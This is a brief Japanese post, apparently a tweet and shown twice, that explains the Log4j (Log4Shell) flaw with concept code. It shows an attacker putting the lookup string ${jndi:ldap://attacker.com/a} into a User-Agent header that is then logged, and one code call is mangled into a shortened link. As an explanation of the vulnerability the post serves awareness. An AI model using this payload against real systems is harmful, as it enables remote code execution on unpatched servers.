<<<#Log4j 概念コード。 import org.apache.log4j.Logger; static Logger log = Logger.getLogger(log4jExample.class.getName()); 攻撃者は、User-Agentヘッダに ${jndi:ldap://attacker.com/a} とか悪意の文字列を設定、 https://t.co/4nI2uoLixK("Request User Agent:" + userAgent); を呼べば💀>>>
<<<#Log4j 概念コード。 import org.apache.log4j.Logger; static Logger log = Logger.getLogger(log4jExample.class.getName()); 攻撃者は、User-Agentヘッダに ${jndi:ldap://attacker.com/a} とか悪意の文字列を設定、 https://t.co/4nI2uoLixK("Request User Agent:" + userAgent); を呼べば💀>>>